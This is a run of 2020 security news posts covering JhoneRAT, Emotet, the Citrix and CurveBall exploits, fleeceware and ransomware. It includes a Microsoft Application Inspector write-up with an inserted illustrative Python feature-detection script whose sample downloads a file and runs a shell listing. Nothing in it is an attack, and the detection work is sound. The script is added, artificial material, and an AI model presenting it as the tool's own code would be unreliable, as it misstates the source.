  • Policy Violations
  • Encrypted Traffic Analytics

Attendees will get to experience life-like cyber security attack situations in a virtualized lab environment, playing the role of both attacker and defender. Operating in an environment similar to many large, complex networks, you will learn how an environment can become compromised, how security breaches are detected, and how to respond to these threats using Stealthwatch. Completing these labs will provide you with test plans to effectively operationalize Stealthwatch.

Whether you’re new to Stealthwatch and interested in trying the product for the first time, or a long-time customer, the Cisco Stealthwatch Test Drive Labs are a great way to see all of the detections and integrations that Stealthwatch can do for your organization and help you tailor your product experience to your network and security needs.

See a schedule of upcoming Cisco Stealthwatch Test Drive Labs.

To learn more about Stealthwatch, please visit: https://www.cisco.com/go/stealthwatch


The post Get in the Security Fast Lane with a Stealthwatch and Encrypted Traffic Analytics Test Drive! appeared first on Cisco Blogs.

JhoneRAT: Cloud based python RAT targeting Middle Eastern countries

Today, Cisco Talos is unveiling the details of a new RAT we have identified that we’re calling “JhoneRAT.” This new RAT is dropped to the victims via malicious Microsoft Office documents. The dropper, along with the Python RAT, attempts to gather information on the victim’s machine and then uses multiple cloud services: Google Drive, Twitter, ImgBB and Google Forms. The RAT attempts to download additional payloads and upload the information gathered during the reconnaissance phase. This particular RAT attempts to target a very specific set of Arabic-speaking countries. The filtering is performed by checking the keyboard layout of the infected systems. Based on the analyzed sample, JhoneRAT targets Saudi Arabia, Iraq, Egypt, Libya, Algeria, Morocco, Tunisia, Oman, Yemen, Syria, UAE, Kuwait, Bahrain and Lebanon.

For more, read the rest on the Talos blog here.

The post JhoneRAT: Cloud based python RAT targeting Middle Eastern countries appeared first on Cisco Blogs.

Microsoft commits to carbon negative by 2030, among other environmental commitments

The environmental crisis is by no means a new issue, but Microsoft is making a renewed effort to combat it, as it announced today that it is committing to becoming carbon negative by 2030, eliminating all past carbon emissions by 2050, and the creation of a $US1 billion fund for investment in carbon removal technologies.

Congress Hears Warnings of Iranian Cyberthreats

Experts Tell House Committee Federal Agencies Must Shore Up Defenses
Iranian-led disinformation campaigns and other cyberthreats against the U.S. are likely to surge in the aftermath of Iranian Major General Qasem Soleimani's death, security and political experts told a House committee Wednesday. That's why federal agencies need to shore up their defenses.

Broadening the Scope: A Comprehensive View of Pen Testing

Penetration tests have long been known as a critical security tool that exposes security weaknesses through simulated attacks on an organization's IT environments. These test results can help prioritize weaknesses, providing a road-map towards remediation. However, the results are also capable of doing even more. They identify and quantify security risk, and can be used as a keystone in

Changing the monolith—Part 2: Whose support do you need?

In Changing the monolith—Part 1: Building alliances for a secure culture, I explored how security leaders can build alliances and why a commitment to change must be signaled from the top. But whose support should you recruit in the first place? In Part 2, I address considerations for the cybersecurity team itself, the organization’s business leaders, and the employees whose buy-in is critical.

Build the right cybersecurity team

It could be debated that the concept of a “deep generalist” is an oxymoron. The analogy I frequently find myself making is you would never ask a dermatologist to perform a hip replacement. A hip replacement is best left to an orthopedic surgeon who has many hours of hands-on experience performing hip replacements. This does not lessen the importance of the dermatologist, who can quickly identify and treat potentially lethal diseases such as skin cancer.

Similarly, not every cybersecurity and privacy professional is deep in all subjects such as governance, technology, law, organizational dynamics, and emotional intelligence. No person is born a specialist.

If you are looking for someone who is excellent at threat prevention, detection, and incident response, hire someone who specializes in those specific tasks and has demonstrated experience and competency. Likewise, be cautious of promoting cybersecurity architects to the role of Chief Information Security Officer (CISO) if they have not demonstrated strategic leadership with the social aptitude to connect with other senior leaders in the organization. CISOs, after all, are not technology champions as much as they are business leaders.

Keep business leaders in the conversation

Leaders can enhance their organizations’ security stance by sending a top-down message across all business units that “security begins with me.” One way to send this message is to regularly brief the executive team and the board on cybersecurity and privacy risks.

Keep business leaders accountable about security.

These should not be product status reports, but briefings on key performance indicators (KPIs) of risk. Business leaders must state what the organization considers to be its top risks.

Here are three ways to guide these conversations:

  1. Evaluate the existing cyber-incident response plan within the context of the overall organization’s business continuity plan. Elevate cyber-incident response plans to account for major outages, severe weather, civil unrest, and epidemics, which all place similar, if not identical, stresses on the business. Ask leadership what they believe the “crown jewels” to be, so you can prioritize your approach to data protection. The team responsible for identifying the “crown jewels” should include senior management from the lines of business and administrative functions.
  2. Review the cybersecurity budget with a business case and a strategy in mind. Many times, security budgets take a backseat to other IT or business priorities, resulting in companies being unprepared to deal with risks and attacks. An annual review of cybersecurity budgets tied to what looks like a “good fit” for the organization is recommended.
  3. Reevaluate cyber insurance on an annual basis and revisit its use and requirements for the organization. Ensure that it’s effective against attacks that could be considered “acts of war,” which might otherwise not be covered by the organization’s policy. Review your policy and ask: What happens if the threat actor was a nation state aiming for another nation state, placing your organization in the crossfire?

Gain buy-in through a frictionless user experience

“Shadow IT” is a persistent problem when there is no sanctioned way for users to collaborate with the outside world. Similarly, users save and hoard emails when, in response to an overly zealous data retention policy, their emails are deleted after 30 days.

Digital transformation introduces a sea change in how cybersecurity is implemented. It’s paramount to provide the user with the most frictionless user experience available, adopting mobile-first, cloud-first philosophies.

Ignoring the user experience in your change implementation plan will only lead users to identify clever ways to circumvent frustrating security controls. Look for ways to prioritize the user experience even while meeting security and compliance goals.

Incremental change versus tearing off the band-aid

Imagine slowly replacing the interior and exterior components of your existing vehicle one by one until you have a “new” car. It doesn’t make sense: You still have to drive the car, even while the replacements are being performed!

Similarly, I’ve seen organizations take this approach in implementing change, attempting to create a modern workplace over a long period of time. However, this draws out complex, multi-platform headaches for months and years, leading to user confusion, loss of confidence in IT, and lost productivity. You wouldn’t “purchase” a new car this way; why take this approach for your organization?

Rather than mixing old parts with new parts, you would save money, shop time, and operational (and emotional) complexity by simply trading in your old car for a new one.

Fewer organizations take this alternative approach of “tearing off the band-aid.” If the user experience is frictionless, more efficient, and enhances the ease of data protection, an organization’s highly motivated employee base will adapt much more easily.

Stay tuned and stay updated

Stay tuned for more! In my next installments, I will cover the topics of process and technology, respectively, and their role in changing the security monolith. Technology on its own solves nothing. What good are building supplies and tools without a blueprint? Similarly, process is the orchestration of the effort, and is necessary to enhance an organization’s cybersecurity, privacy, compliance, and productivity.

In the meantime, bookmark the Security blog to keep up with our expert coverage on security matters. Also, follow us at @MSFTSecurity for the latest news and updates on cybersecurity.

The post Changing the monolith—Part 2: Whose support do you need? appeared first on Microsoft Security.

Emotet Locked onto US Military and Government

New research into the latest victims of Emotet has found increased instances of the malware affecting the United States of America's government and military.

The pernicious malware, which is spread via email, has been infecting organizations all over the world since 2014. By shining a spotlight on Emotet's recent activities, researchers at Cisco Talos discovered that the US government is among the latest victims to be compromised. 

Researchers made the discovery by closely examining the patterns of outbound email associated with the malware. 

A Talos spokesperson said: "If a person has substantial email ties to a particular organization, when they become infected with Emotet the effects would manifest in the form of increased outbound Emotet email directed at that organization. 

"One of the most vivid illustrations of this effect can be seen in Emotet's relationship to the .mil (U.S. military) and .gov (U.S./state government) top-level domains (TLDs). 

"When Emotet emerged from its summer vacation back in mid-September 2019, relatively few outbound emails were seen directed at the .mil and .gov TLDs. But sometime in the past few months, Emotet was able to successfully compromise one or more persons working for or with the U.S. government."

The malware's successful compromise of at least one US government employee led to what researchers described as a "rapid increase" in the number of infectious Emotet messages directed at the .mil and .gov TLDs in December 2019.

Following a brief spot of respite over the winter holidays, Emotet is once again causing trouble. Cisco Talos said that the upward trend in the quantity of messages directed at .mil and .gov had "continued into January 2020."

Emotet works by stealing someone's email, then impersonating the victims and sending copies of itself in reply. The malicious emails are delivered through a network of stolen SMTP accounts. 

Recipients, conned into thinking that they are receiving a message from a friend or professional colleague, open the email and are then infected.

The simplicity of Emotet's attack strategy belies its effectiveness. "This relatively simple email-man-in-the-middle social engineering approach has made Emotet one of the most prolific vehicles for delivering malware that we have seen in modern times," said researchers. 

Alarming Trend: More Ransomware Gangs Exfiltrating Data

Criminals Increasingly Leak Stolen Data to Force Bitcoin Payoff
As if ransomware wasn't already bad enough, more gangs are now exfiltrating data from victims before leaving systems crypto-locked. Seeking greater leverage against non-paying victims, Maze and Sodinokibi attackers are not just threatening to leak stolen data; they're also following through.

LORCA Announces Fourth and Largest Cohort of Cybersecurity Innovators

The London Office for Rapid Cybersecurity Advancement (LORCA) has announced the 20 scale-ups selected to join its fourth cohort of cyber-innovators.

The latest group is LORCA’s largest and most international yet – including companies from the UK, Israel, Spain, Switzerland, Denmark, Singapore and the US – using technologies such as automation and quantum to protect UK industry against the latest threats.

LORCA is hosted and delivered by Plexal at Here East in London’s Queen Elizabeth Olympic Park. The year-long project will support the 20 new companies to scale, secure investment, access new markets and participate in overseas trade missions, with the ultimate aim of growing the British cybersecurity industry.

The scaleups will also receive technical and commercial support from the program’s delivery partner Deloitte and engineering expertise from the Centre for Secure Information Technologies (CSIT) at Queen’s University Belfast.

LORCA launched in June 2018 with backing from the Department for Digital, Culture, Media & Sport and has enrolled 55 companies into its program.

The latest cohort includes scaleups with a range of cutting-edge solutions, invited to apply based on three innovation themes identified by industry leaders from various sectors:

  • Connected Economy
  • Connected Everything
  • Connected Everyone

Saj Huq, program director, LORCA, said: “LORCA exists to bring cutting-edge technology to market and to enable the most promising cyber-innovators to become globally competitive businesses. The international reach and the variety of solutions within our incoming fourth cohort is an exciting demonstration of both the strength and attractiveness of the UK market, as well as an illustration of the increasingly prominent role that LORCA plays as a convener and collaborator within the global innovation ecosystem.”

The 20 companies enrolling in the latest cohort are:

  1. Acreto
  2. Anzen Technologies Systems
  3. Avnos
  4. Contingent
  5. Continuum Security
  6. Darkbeam
  7. Heimdal Security
  8. Keyless
  9. Kinnami
  10. L7 Defence
  11. Orpheus
  12. Osirium
  13. Risk Ledger
  14. ShieldIOT
  15. SureCert
  16. ThreatAware
  17. ThunderCipher (Licel)
  18. Variti
  19. VIVIDA
  20. Westgate Cyber Security

Exploiting Citrix Application Delivery Controller (ADC) and Gateway CVE-2019-19781 with Core Impact

A Core Impact module was released on January 14, 2020 to exploit an as-yet unpatched path traversal flaw in Citrix Application Delivery Controller (ADC) and Gateway (formerly known as NetScaler ADC & NetScaler Gateway) identified as CVE-2019-19781.

This critical vulnerability is a path traversal bug that can be exploited over the internet by an attacker. It can be exploited to remotely execute code, enabling control over devices and access to internal enterprise networks. An attacker would not have to provide authentication credentials for the device when launching an attack. Instead, a threat actor could send a booby-trapped request to the vulnerable Citrix appliance, along with the exploit code they want to execute.

It is estimated that currently, more than 80,000 Citrix implementations are vulnerable. Citrix has now published configuration changes to help organizations mitigate these attacks. The company stated they expect fixes for versions 10.5x through 13.0x to be rolled out between January 20-31, 2020.

For a full list of exploits available within Core Impact, visit https://www.coresecurity.com/products/core-impact/recent-exploits-and-updates.


Bill for New Orleans Cyber-Attack $7m and Rising

The December cyber-attack on the southern city of New Orleans has caused over $7m of damage.

New Orleans mayor Latoya Cantrell said yesterday that the already alarmingly high figure continues to grow as the city recovers from the incident. 

A cyber-insurance policy taken out by New Orleans prior to the attack has allowed the Big Easy to recover $3m, but the popular vacation city will still be left cruelly out of pocket as a result of the incident. According to Cantrell, the cost is just something that the city will "have to eat."

"This is something that we have to deal with as a city and it is an expense that we also have to eat as a city. It speaks to the priority of infrastructure that has always been a priority of mine and it also speaks to the real push for maintenance of infrastructure. This will be ongoing," Cantrell told Fox8.

The $7m figure does not include the cost of paying a ransom to the attack's perpetrators, who, despite using ransomware to cripple the city's computer networks, never issued a ransom demand. 

In a stoic display of optimism, Cantrell told Fox8 that the ravages wrought by the attack, although bad, could have been far worse. 

She said: "The early detection and the intrusion helped us one. IT halted our networks, shut them down completely, which prevented this cyber-attack from being catastrophic."

Recovery from the attack is still a long way off, according to the city’s chief administrative officer, Gilbert Montano, as New Orleans is currently wading through a significant backlog of work that resulted from the forced reversion to manual governance.

"Now, we’re in the stabilization period. We are trying to rebuild what we had to turn off essentially and that is a long, laborious, time-sensitive process and that’s where I am telling staff and employees we’re looking maybe at a six to eight month window before actual normalcy starts to integrate all of our systems," said Montano.

Expenses that are included in the $7m figure are the cost of purchasing 3,400 new computers and improving the city's IT infrastructure in an effort to prevent future cyber-catastrophes.

Hundreds of million users installed Android fleeceware apps from Google Play

Security experts from Sophos discovered 25 Android apps on the official Google Play that were involved in financial fraud, 600 million affected.

Security researchers from Sophos discovered a set of so-called fleeceware apps that have been installed by more than 600 million Android users.

Fleeceware apps are malicious applications uploaded to the official Google Play Store that are involved in fraudulent activities. These apps offer a short free trial period, and if users don’t cancel the “subscription” they charge the Android users an excessive amount of money.

“The total number of installations of these apps, as reported on Google’s own Play pages, is high: nearly 600 million in total, across fewer than 25 apps; A few of the apps on the store appear to have been installed on 100 million+ devices, which would rival some of the top, legitimate app publishers on Google Play.” reads the analysis published by Sophos.

“We have good reason to believe that the install count may have, in some cases, been manipulated. But some of the apps, including a popular keyboard app that allegedly transmits the full text of whatever its users type back to China, may legitimately have that many downloads.”

Experts warn of the business model behind the fleeceware apps, which can pose significant risks to Android users.

In September, Sophos published a first report warning of this phenomenon: the company discovered a first set of 24 Android apps that were charging huge fees (between $100 and $240 per year) for several generic apps (i.e. QR/barcode readers).

Now Sophos has discovered a new set of Android “fleeceware” apps that monetize this fraudulent behavior; they continue to abuse the app trial mechanism to impose charges on users even after they have uninstalled the app.

The fleeceware apps have a high install count, some of them with tens of millions of installs, a circumstance that suggests the threat actors behind these apps may have used third-party pay-per-install services to inflate the number of installs.

“Some of these apps are very unprofessional looking. Based on past experience, it may have been the case that these app developers could have used a paid service to bloat their install counts and forge a large number of four- and five-star reviews.” continues the report. “You can identify some of these falsified user review clusters if you scrutinize the recent 5 star reviews; one-to-three word, five star reviews have a propensity to be “sockpuppet” reviews.”

Sophos has published a list of the apps classified as fleeceware.

Pierluigi Paganini

(SecurityAffairs – fleeceware apps, fraud)

The post Hundreds of million users installed Android fleeceware apps from Google Play appeared first on Security Affairs.

Introducing Microsoft Application Inspector

Modern software development practices often involve building applications from hundreds of existing components, whether they’re written by another team in your organization, an external vendor, or someone in the open source community. Reuse has great benefits, including time-to-market, quality, and interoperability, but sometimes brings the cost of hidden complexity and risk.

You trust your engineering team, but the code they write often accounts for only a tiny fraction of the entire application. How well do you understand what all those external software components actually do? You may find that you’re placing as much trust in each of the thousands of contributors to those components as you have in your in-house engineering team.

At Microsoft, our software engineers use open source software to provide our customers high-quality software and services. Recognizing the inherent risks in trusting open source software, we created a source code analyzer called Microsoft Application Inspector to identify “interesting” features and metadata, like the use of cryptography, connecting to a remote entity, and the platforms it runs on.

Application Inspector differs from more typical static analysis tools in that it isn’t limited to detecting poor programming practices; rather, it surfaces interesting characteristics in the code that would otherwise be time-consuming or difficult to identify through manual introspection. It then simply reports what’s there, without judgement.

For example, consider this snippet of Python source code:

Here we can see a program that downloads content from a URL, writes it to the file system, and then executes a shell command to list details of that file. If we run this code through Application Inspector, we’ll see the following features identified, which tell us a lot about what it can do:

  • FileOperation.Write
  • Network.Connection.Http
  • Process.DynamicExecution

In this small example, it would be trivial to examine the snippet manually to identify those same features, but many components contain tens of thousands of lines of code, and modern web applications often use hundreds of such components. Application Inspector is designed to be used individually or at scale and can analyze millions of lines of source code from components built using many different programming languages. It’s simply infeasible to attempt to do this manually.

Application Inspector is positioned to help in key scenarios

We use Application Inspector to identify key changes to a component’s feature set over time (version to version), which can indicate anything from an increased attack surface to a malicious backdoor. We also use the tool to identify high-risk components and those with unexpected features that require additional scrutiny, under the theory that a vulnerability in a component that is involved in cryptography, authentication, or deserialization would likely have higher impact than others.
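As an added example (not Application Inspector's own code or rule set), the following Python script shows the idea behind both the feature identification described above and the version-to-version comparison in this paragraph: a handful of hypothetical regex rules tag a constructed sample matching the snippet's description, and a second constructed version is diffed against the first to surface a newly introduced feature. The rule names, patterns and sample sources are assumptions made for illustration.

```python
"""Minimal pattern-based feature tagger in the spirit of Application Inspector.

Added example: the rules below are illustrative assumptions, not the tool's
real patterns, and detection is purely lexical (no data-flow analysis).
"""
import re
from typing import Dict, List, Set

# Hypothetical rules: feature tag -> regexes matched against each source line.
FEATURE_RULES: Dict[str, List[str]] = {
    "Network.Connection.Http": [
        r"\burllib\.request\.urlopen\s*\(",
        r"\brequests\.(get|post|put|delete)\s*\(",
        r"\bhttp\.client\.HTTPS?Connection\s*\(",
    ],
    "FileOperation.Write": [
        r"\bopen\s*\([^)]*,\s*['\"][wa]b?['\"]",  # open(..., "w"/"wb"/"a")
        r"\.write\s*\(",
    ],
    "Process.DynamicExecution": [
        r"\bos\.system\s*\(",
        r"\bsubprocess\.(run|call|Popen|check_output)\s*\(",
        r"\beval\s*\(|\bexec\s*\(",
    ],
    "Cryptography.Hashing": [
        r"\bhashlib\.(md5|sha1|sha256|sha512)\s*\(",
    ],
}


def identify_features(source: str) -> Dict[str, List[int]]:
    """Return {feature_tag: [matching line numbers]} for a source text."""
    hits: Dict[str, List[int]] = {}
    for lineno, line in enumerate(source.splitlines(), start=1):
        for tag, patterns in FEATURE_RULES.items():
            if any(re.search(p, line) for p in patterns):
                hits.setdefault(tag, []).append(lineno)
    return hits


def feature_set(source: str) -> Set[str]:
    """Just the set of tags, which is what a version comparison needs."""
    return set(identify_features(source))


def diff_features(old_source: str, new_source: str) -> Dict[str, List[str]]:
    """Features gained or lost between two versions of a component."""
    old, new = feature_set(old_source), feature_set(new_source)
    return {"added": sorted(new - old), "removed": sorted(old - new)}


# Constructed sample (assumption) written to match the snippet described in
# the text: fetch a URL, write it to disk, list the file via a shell command.
SAMPLE_V1 = '''\
import urllib.request, os
data = urllib.request.urlopen("https://example.invalid/file.bin").read()
with open("downloaded.bin", "wb") as fh:
    fh.write(data)
os.system("ls -l downloaded.bin")
'''

# A constructed "next release" that quietly starts hashing the payload; the
# diff flags the new cryptography feature for additional scrutiny.
SAMPLE_V2 = SAMPLE_V1 + '''\
import hashlib
print(hashlib.sha256(data).hexdigest())
'''


if __name__ == "__main__":
    for tag, lines in sorted(identify_features(SAMPLE_V1).items()):
        print(f"{tag}: lines {lines}")
    print("v1 -> v2:", diff_features(SAMPLE_V1, SAMPLE_V2))
```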

Using Application Inspector

Application Inspector is a cross-platform, command-line tool that can produce output in multiple formats, including JSON and interactive HTML. Here is an example of an HTML report:

Each icon in the report above represents a feature that was identified in the source code. That feature is expanded on the right-hand side of the report, and by clicking any of the links, you can view the source code snippets that contributed to that identification.

Each feature is also broken down into more specific categories and an associated confidence, which can be accessed by expanding the row.

Application Inspector comes with hundreds of feature detection patterns covering many popular programming languages, with good support for the following types of characteristics:

  • Application frameworks (development, testing)
  • Cloud / Service APIs (Microsoft Azure, Amazon AWS, and Google Cloud Platform)
  • Cryptography (symmetric, asymmetric, hashing, and TLS)
  • Data types (sensitive, personally identifiable information)
  • Operating system functions (platform identification, file system, registry, and user accounts)
  • Security features (authentication and authorization)

Get started with Application Inspector

Application Inspector can identify interesting features in source code, enabling you to better understand the software components that your applications use. Application Inspector is open source, cross-platform (.NET Core), and can be downloaded at github.com/Microsoft/ApplicationInspector. We welcome all contributions and feedback.

The post Introducing Microsoft Application Inspector appeared first on Microsoft Security.

ISA Global Cybersecurity Alliance Triples Membership

A worldwide cybersecurity alliance established last year by the International Society of Automation (ISA) has tripled its membership in just six months. 

The ISA Global Cybersecurity Alliance (ISAGCA) drew its first breath in July 2019. The organization was set up with the intention to provide an open, collaborative forum to advance cybersecurity awareness, readiness, and knowledge sharing. 

Founded with six initial members, ISAGCA announced on Tuesday that its ranks have since swelled to include an additional 23 companies and organizations. 

As of the end of 2019, the original vanguard of Schneider Electric, Rockwell Automation, Honeywell, Johnson Controls, Claroty, and Nozomi Networks had been strengthened by the addition of aeSolutions, Bayshore Networks, Beijing Winicssec Technologies Co. Ltd., Digital Immunity, Dragos, exida, ISA Security Compliance Institute, ISA99 Committee, Idaho National Laboratory, LOGIIC (Linking the Oil and Gas Industry to Improve Cybersecurity), Mission Secure, Inc., Mocana Corporation, Munio Security, PAS Global, Radiflow, Senhasegura (supporting member), Tenable, TiSafe, Tripwire, WisePlant, Wallix Group, and Xage Security.

The new adherents to the cause have all joined as founding members. Alliance membership is open to all end users, asset owners, government agencies, and other cybersecurity-focused organizations. 

"The cyber threat to critical infrastructure has never been greater," said Eddie Habibi, founder and CEO of newly welcomed ISAGCA member PAS Global.

ISA executive director Mary Ramsey said: "When we pair ISA's standards expertise with the real-world experience of companies like PAS, we can make major strides in advancing cybersecurity.

"Our founding members are united in their belief that security is a journey, not a destination, and they are committed to developing the resources that asset owners need to make progress." 

New alliance member Tripwire was sensible of the organization’s potential to influence cybersecurity around the globe. 

A Tripwire spokesman said: "In becoming a founding member of ISA Global Cybersecurity Alliance, Tripwire will participate in creating initiatives to increase industry awareness, creating education and certification programs, and advocating for sensible cybersecurity approaches with regulatory bodies and world governments."

ISAGCA is organized into four general focus areas: Awareness & Outreach, Compliance & Prevention, Education & Training, and Advocacy & Adoption. Each area has an attached working group, actively working on projects that include creating an easy-to-follow, condensed guide to implementing the ISA/IEC 62443 series of standards and setting up a database of speakers with expertise and experience in automation cybersecurity who are committed to presenting at industry events.

Apps are sharing more of your data with ad industry than you may think

Apps like Grindr, Tinder and Happn are (over-)sharing data about sexuality, religion, and location with a shadowy network of data brokers. And it's not just dating apps that are doing it...

Business Disruption Attacks Most Prevalent in Last 12 Months

Business disruption was the main objective of attackers in the last year, with ransomware, DDoS and malware commonly used.

According to the CrowdStrike Services Cyber Front Lines Report, which offers observations from its incident response and proactive services, over a third (36%) of incidents involved ransomware, destructive malware or denial of service attacks. CrowdStrike characterized these three as focused on “business disruption,” and while an adversary’s main goal in a ransomware attack is financial gain, the impact of disruption to a business can often outweigh the loss incurred by paying the ransom.

Also observed in 25% of the investigated incidents was data theft, including the theft of intellectual property, personally identifiable information and personal health information. IP theft has been linked to numerous nation state adversaries that specialize in targeted intrusion attacks, while PII and PHI data theft can enable both espionage and criminally-motivated operations.

“Typically, this type of data may be used by a cyber-espionage actor to build a dossier on a high-profile target, or a cyber-criminal may sell or ransom the information,” the report said.

To get on to a network, the most popular vector was spear-phishing, accounting for 35% of investigated cases, compared to 16% using web attacks and another 16% using compromised credentials.

Jack Mannino, CEO at nVisium, told Infosecurity that in many cases, we’re struggling with many of the same issues from a decade ago, while we’re seeing an increase in attacks against cloud infrastructure and systems.

“While many organizations have been in the cloud for a while, countless teams are still undertaking transformation and are attempting to replicate security controls that they have developed internally within a new architecture,” he said.

The report also found that organizations that meet CrowdStrike’s 1-10-60 benchmark — detect an incident in one minute, investigate in 10 minutes and remediate within an hour — are improving their chances of stopping cyber-adversaries. However, another recent CrowdStrike survey found that the vast majority of organizations struggle to meet the 1-10-60 standard, even though most of them see adherence to the rule as a “game changer” in ensuring protection. “Adhering to the rule is a challenging benchmark that requires speed and experience,” the report said.

Shawn Henry, chief security officer and president of CrowdStrike Services, said: “The report offers observations into why ransomware and business disruption dominated headlines in 2019 and gives valuable insight into why issues with adversarial dwell time remain a problem for businesses around the world. Strong cybersecurity posture ultimately lies within technology that ensures early detection, swift response and fast mitigation to keep adversaries off networks for good.”

Rui Lopes, engineering and technical support manager at Panda Security, said that the use of cyberspace to carry out all kinds of malicious activities is not going anywhere in 2020, “and while cybersecurity players work to mitigate attacks, organizations struggle on their end with a gap in security experts which may not be covered even if they have a budget for it.”

Fugue open sources Regula to evaluate Terraform for security misconfigurations and compliance violations

Fugue has open sourced Regula, a tool that evaluates Terraform infrastructure-as-code for security misconfigurations and compliance violations prior to deployment. Regula rules are written in Rego, the open source policy language employed by the Open Policy Agent project and can be integrated into CI/CD pipelines to prevent cloud infrastructure deployments that may violate security and compliance best practices. “Developers design, build, and modify their own cloud infrastructure environments, and they increasingly own the security and … More

The post Fugue open sources Regula to evaluate Terraform for security misconfigurations and compliance violations appeared first on Help Net Security.

Two PoC exploits for CVE-2020-0601 NSACrypto flaw released

Researchers published proof-of-concept (PoC) code exploits for the recently-patched CVE-2020-0601 flaw in the Windows operating system, which was reported by the NSA.

Security researchers have published two proof-of-concept (PoC) code exploits for the recently-patched CVE-2020-0601 vulnerability that has been reported to Microsoft by the US National Security Agency (NSA).

Microsoft Patch Tuesday updates for January 2020 address a total of 49 vulnerabilities in various products, including a serious flaw, tracked as CVE-2020-0601, in the core cryptographic component of Windows 10, Server 2016 and 2019 editions.

The CVE-2020-0601 flaw differs from previously addressed flaws in that it was reported by the NSA; this is the first time the US intelligence agency has reported a bug to the tech giant.

The flaw, dubbed ‘NSACrypt’ or ‘CurveBall,’ resides in the Crypt32.dll module that contains various ‘Certificate and Cryptographic Messaging functions’ used by the Windows Crypto API for data encryption.  

The flaw affects the way the Crypt32.dll module validates Elliptic Curve Cryptography (ECC) certificates.

In a press release published by the NSA, the agency explains “the certificate validation vulnerability allows an attacker to undermine how Windows verifies cryptographic trust and can enable remote code execution.”

“A spoofing vulnerability exists in the way Windows CryptoAPI (Crypt32.dll) validates Elliptic Curve Cryptography (ECC) certificates.” reads the security advisory published by Microsoft.

“An attacker could exploit the vulnerability by using a spoofed code-signing certificate to sign a malicious executable, making it appear the file was from a trusted, legitimate source. The user would have no way of knowing the file was malicious, because the digital signature would appear to be from a trusted provider.”

An attacker could exploit the flaw to conduct man-in-the-middle attacks and decrypt confidential information on user connections to the affected software.

An attacker could also trigger the issue to spoof digital signatures on software tricking the system into believing that it is a legitimate application.

NSA pointed out that the CVE-2020-0601 vulnerability can allow an attacker to:

  • launch MitM (man-in-the-middle) attacks and intercept and fake HTTPS connections
  • fake signatures for files and emails
  • fake signed-executable code launched inside Windows

Security researcher Tal Be’ery published a high-level technical analysis of the bug, explaining that “the root cause of this vulnerability is a flawed implementation of the Elliptic Curve Cryptography (ECC) within Microsoft’s code.”

The US DHS CISA agency also issued an emergency directive urging government agencies to address the bug in their systems within ten days.

“CISA has determined that these vulnerabilities pose an unacceptable risk to the Federal enterprise and require an immediate and emergency action. This determination is based on the likelihood of the vulnerabilities being weaponized, combined with the widespread use of the affected software across the Executive Branch and high potential for a compromise of integrity and confidentiality of agency information.” reads the emergency directive.

Security expert Saleem Rashid was the first to create proof-of-concept code that fakes TLS certificates, allowing an attacker to set up a site that looks like a legitimate one.

Rashid didn’t publish the exploit code to avoid miscreants using it in the wild. Unfortunately, other experts decided to publicly release the exploit code for the CVE-2020-0601 flaw. Swiss cybersecurity firm Kudelski Security published on GitHub a working exploit for the flaw. Danish security researcher Ollypwn also published an exploit for the CurveBall vulnerability.

The availability online of working exploits for the CVE-2020-0601 vulnerability ensures that threat actors will start exploiting it; for this reason it is essential to patch systems.

Pierluigi Paganini

(SecurityAffairs – CVE-2020-0601, hacking)

The post Two PoC exploits for CVE-2020-0601 NSACrypto flaw released appeared first on Security Affairs.

Facebook users will be notified when their credentials are used for third-party app logins

Facebook will (finally!) explicitly tell users who use Facebook Login to log into third-party apps what information those apps are harvesting from their FB account. At the same time, users will be able to react quickly if someone managed to compromise their Facebook accounts and is using their credentials to access other apps and websites. Login Notifications The new feature, called Login Notifications, will deliver notifications to users via the Facebook app and user’s associated … More

The post Facebook users will be notified when their credentials are used for third-party app logins appeared first on Help Net Security.

China Promises Action on Tech Transfers and IP Protection

Phase One of the US-China trade deal has finally been signed, with promises from Beijing that it will improve protection of IP and trade secrets and end forced tech transfers, although security experts will be skeptical.

The majority of the headlines focused on the scrapping of some mooted tariffs on goods from China including mobile phones and computers, as well as promises to increase imports of US goods by $200bn.

However, in the document itself, major sections are devoted to several areas of concern for many US businesses over the past decade or more.

These include the forced transfer of IP to a local Chinese partner that many foreign businesses have been required to follow in order to gain access to the country’s vast market. In the new document, both parties recognize that such transfers should only happen on “voluntary, market-based terms.”

“Neither Party shall require or pressure persons of the other Party to transfer technology to its persons in relation to acquisitions, joint ventures, or other investment transactions,” it continued.

The new deal also contains significant new promises by China to improve protection of intellectual property, trade secrets and confidential business information and combat counterfeiting and piracy online.

“China recognizes the importance of establishing and implementing a comprehensive legal system of intellectual property protection and enforcement as it transforms from a major intellectual property consumer to a major intellectual property producer,” it said.

Specifically, China has agreed to impose “heavier punishment” including jail time and monetary fines to deter IP theft.

However, it remains to be seen whether any of the promises made by Beijing are adhered to.

Both the US and UK famously signed an agreement with China in 2015 promising it would cease all economic espionage activity. Experts revealed that activity began to ramp up again from the Chinese side soon after.

China is also increasing its collection of sensitive corporate data from all firms operating within its borders, under a new corporate social credit system, which recently raised alarm bells at the EU Chamber of Commerce in China.

This could effectively achieve the same end for the Chinese government as forced tech transfers, it warned.

“The system of regulatory ratings necessitates the collection of massive amounts of company data, mostly through mandatory data transfers to government authorities, creating an increasingly complete disclosure of a company’s profile,” the report claimed. “Large data transfers are likely to include some sensitive data points, such as technological details and personnel information.”

Researchers have also recently revealed how Chinese state hacking groups are increasingly using local companies as a front for their espionage activities.

Ako Ransomware Using Spam Attachments to Target Networks

Security researchers observed that Ako ransomware is using malicious spam attachments to go after organizations’ networks. On January 14, AppRiver Senior Cybersecurity Analyst David Pickett contacted Bleeping Computer and told the computer self-help site that his company had observed Ako being distributed via spam email. Using subject lines such as “Agreement 2020 #1775505,” the attack […]… Read More

The post Ako Ransomware Using Spam Attachments to Target Networks appeared first on The State of Security.

Trump Takes on Apple Over FBI’s Backdoor Request

Donald Trump has hit out at Apple after it refused to unlock the iPhone of a suspected terrorist shooter who killed three sailors last month, setting the firm on another collision course with the authorities over its stance on user privacy.

In a developing story reminiscent of the San Bernardino shootings four years ago, Apple declined to help the FBI unlock the smartphone of a 21-year-old Royal Saudi Air Force lieutenant who went on a killing spree at Pensacola Air Force base.

Although it claimed to have given the FBI “all of the data in our possession” when approached by agents a month ago, Apple maintained that bypassing the killer’s passcodes would create a dangerous precedent.

“We have always maintained there is no such thing as a backdoor just for the good guys. Backdoors can also be exploited by those who threaten our national security and the data security of our customers,” it said in a statement.

“Today, law enforcement has access to more data than ever before in history, so Americans do not have to choose between weakening encryption and solving investigations. We feel strongly encryption is vital to protecting our country and our users' data.”

